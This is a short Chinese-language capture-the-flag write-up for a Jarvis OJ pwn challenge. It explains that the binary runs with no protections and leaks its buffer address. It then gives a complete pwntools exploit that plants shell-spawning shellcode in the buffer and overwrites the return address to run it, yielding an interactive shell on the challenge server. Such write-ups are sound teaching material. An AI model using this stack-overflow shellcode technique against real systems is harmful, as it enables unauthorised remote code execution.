拿到题目,首先我们检查一下程序的保护:
可以看出来,程序什么保护也没开,既然没开NX保护,说明堆栈上的代码可以执行。
我们打开IDA反汇编一下:
我们看到这里可输入一个buf,并且题目把buf的地址也输出到屏幕上,我们就可以控制buf植入shell code了,再返回调用即可。
p.recvuntil("this:")
buf_addr=int(p.recv(10),16)
shellcode=asm(shellcraft.sh())
首先我们接受buf的地址,把它保存起来。
这里有一个要注意的地方,就是这里传出来的地址是字符串类型的,我们需要把它转换成整数类型:
int(p.recv(10),16)
这条语句就是把字符串转换成16进制的整数。
然后我们构造payload就可以了。
完整的exp如下:
#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9877)
p.recvuntil("this:")
buf_addr=int(p.recv(10),16)
shellcode=asm(shellcraft.sh())
payload=shellcode
payload=payload.ljust(0x8c)
payload+=p32(buf_addr)
p.sendline(payload)
p.interactive()
运行结果: